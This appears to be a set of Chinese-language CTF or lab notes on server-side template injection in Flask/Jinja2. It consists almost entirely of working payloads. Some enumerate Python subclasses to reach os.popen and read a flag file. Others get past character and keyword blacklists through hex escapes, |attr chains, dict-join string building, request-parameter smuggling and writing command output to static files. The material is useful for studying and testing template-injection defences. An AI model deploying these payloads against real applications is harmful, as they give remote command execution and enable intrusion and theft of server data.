查找想要的模块
cnt = 0
for item in [].__class__.__base__.__subclasses__():try:if 'os' in item.__init__.__globals__:print(cnt, item)cnt += 1except:cnt += 1continue
{% for i in range(300) %}{{ i }} - {{ ''.__class__.__mro__[1].__subclasses__()[i] }}<br>
{% endfor %}{%for i in range(300)%}{%print(i)%}-{%print(''.__class__.__mro__[1].__subclasses__()[i])%}<br>{%endfor%}
level 1
{{7*7}}
-->49
找<class 'object'>
{{''.__class__.__bases__[0].__subclasses__()}}
{{[].__class__.__bases__[0].__subclasses__()}}
{{().__class__.__bases__.__subclasses__()}}{{[].__class__.__mro__[1].__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{().__class__.__mro__[1].__subclasses__()}}{{config.items()}}
{{config}}
{{''.__class__.__mro__[1].__subclasses__()[157]}}
Hello <class 'os._wrap_close'>{{''.__class__.__mro__[1].__subclasses__()[157].__init__.__globals__['sys'].modules['os'].popen('cat flag').read()}}
Hello SSTILAB{enjoy_flask_ssti}🌟
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("ls")
{{过滤
{%for i in range(300)%}{%print(i)%}-{%print(''.__class__.__mro__[1].__subclasses__()[i])%}<br>{%endfor%}
{%print(''.__class__.__mro__[1].__subclasses__()[157].__init__.__globals__['popen']('cat flag').read())%}{%print(''.__class__.__mro__[1].__subclasses__()[157].__init__.__globals__['sys'].modules["os"].popen('ls').read())%}{%print(get_flashed_messages.__globals__.sys.modules['os'].popen('ls').read())%}
过滤_
可以编码绕过 python解析器支持 hex ,unicode编码 (不建议用base64仅python2支持)
{{lipsum['\x5f\x5fglobals\x5f\x5f']['os']['popen']('cat flag').read()}}
传参过滤引号
http://192.168.58.128:4999/level/5?zxc=cat flag
POST:code={{lipsum.__globals__.os.popen(request.args.zxc).read()}}
只填引号都报错,被waf
request.args.x1
get传参
request.values.x1
所有参数
request.cookies
cookies参数
request.headers
请求头参数
request.form.x1
post传参(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data
post传参(Content-Type:a/b)
request.json
post传json(Content-Type:application/json)
过滤[[
{{lipsum.__globals__.os.popen('cat flag').read()}}
{{url_for.__globals__.os.popen('ls').read()}}
{{get_flashed_messages.__globals__.os.popen('ls').read()}}
{{cycler.__init__.__globals__.os.popen('ls').read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{lipsum.__globals__['os'].popen('ls').read()}}
获取键值或下标
dict['__builtins__']
dict.__getitem__('__builtins__')
dict.pop('__builtins__')
dict.get('__builtins__')
dict.setdefault('__builtins__')
list[0]
list.__getitem__(0)
list.pop(0)
替换一下
{{lipsum.__globals__.get('os').popen('ls').read()}}
blind盲注
https://blog.csdn.net/2401_84009749/article/details/137661728
其中lipsum
为 flask框架 内置函数 通用
{{lipsum.__globals__['os'].popen('echo "zxc" > static/1.txt').read()}}
{{lipsum.__globals__['os'].popen('echo `cat flag` > static/1.txt').read()}}http://192.168.58.128:4999/static/1.txt
过滤.
{{lipsum['__globals__']['os']['popen']('cat flag')['read']()}}
{{lipsum['__globals__']['__getitem__']('os')['popen']('cat flag')['read']()}}{% for i in range(300) %}{{i}}-{{''['__class__']['__mro__'][1]['__subclasses__']()[i]}}<br>{% endfor %}{{''['__class__']['__mro__'][1]['__subclasses__']()[157]['__init__']['__globals__']['popen']('cat flag')['read']()}}{{''|attr('__class__')|attr('__base__')|attr('__subclasses__')()|attr('__getitem__')(157)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen')('cat flag')|attr('read')()}}
关键字过滤"class", "arg", "form", "value", "data", "request", "init", "global", "open", "mro", "base", "attr"
{{lipsum['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['os']['\x70\x6f\x70\x65\x6e']('cat flag')['read']()}}
过滤数字
{{config}}
{{config.items()}}
bl[‘’', ‘"’, ‘+’, ‘request’, ‘.’, ‘[’, ‘]’]
ban 了 request
思考如何返回字符串?
通过过滤器 | join 返回变量
ban 了 . []
如何取属性 ?
通过 |attr()
如何取键值 ?
通过 __getitem__('key')
然后用 {%set %}拼接
{{lipsum.__globals__.os.popen('ls').read()}}
{%set a=dict(__glo=a,bals__=a)|join%}
{%set b=dict(o=a,s=a)|join%}
{%set e=dict(__ge=a,titem__=a)|join%}
{%set c=dict(po=a,pen=a)|join%}
{%set cmd=dict(l=a,s=a)|join%}
{%set d=dict(re=a,ad=a)|join%}
{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}
{{lipsum.__globals__.os.popen('cat flag').read()}}
{%set a=dict(__glo=a,bals__=a)|join%}
{%set b=dict(o=a,s=a)|join%}
{%set e=dict(__ge=a,titem__=a)|join%}
{%set c=dict(po=a,pen=a)|join%}{%set pop=dict(pop=a)|join%}
{%set space=(lipsum|string|list)|attr(pop)(9)%}{%set cat=dict(cat=a)|join%}
{%set cmd=(cat,space,dict(flag=a)|join)|join%}
{%set d=dict(re=a,ad=a)|join%}
{{lipsum|attr(a)|attr(e)(b)|attr(c)(cmd)|attr(d)()}}
{{lipsum|attr("__globals__")|attr("__getitem__")("os")|attr("popen")("cat flag")|attr("read")()}}
{% set pop=dict(pop=a)|join%}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18)%}
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set space=(lipsum|string|list)|attr(pop)(9)%}
{% set os=dict(os=a)|join %}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}
{{(lipsum|attr(globals))|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}
bl['_', '.', '0-9', '\', ''', '"', '[', ']']
{% set nine=dict(aaaaaaaaa=a)|join|count %}
{% set eighteen=nine+nine %}{% set pop=dict(pop=a)|join%}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(eighteen)%}
{% set globals=(xiahuaxian,xiahuaxian,dict(globals=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set getitem=(xiahuaxian,xiahuaxian,dict(getitem=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set space=(lipsum|string|list)|attr(pop)(nine)%}
{% set os=dict(os=a)|join %}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set cmd=(cat,space,dict(flag=a)|join)|join%}
{% set read=dict(read=a)|join%}
{{(lipsum|attr(globals))|attr(getitem)(os)|attr(popen)(cmd)|attr(read)()}}
bl['_', '.', '\', ''', '"', 'request', '+', 'class', 'init', 'arg', 'config', 'app', 'self', '[', ']']
{{lipsum.__globals__.os.popen('cat flag').read()}}
https://www.cnblogs.com/2ha0yuk7on/p/16648850.html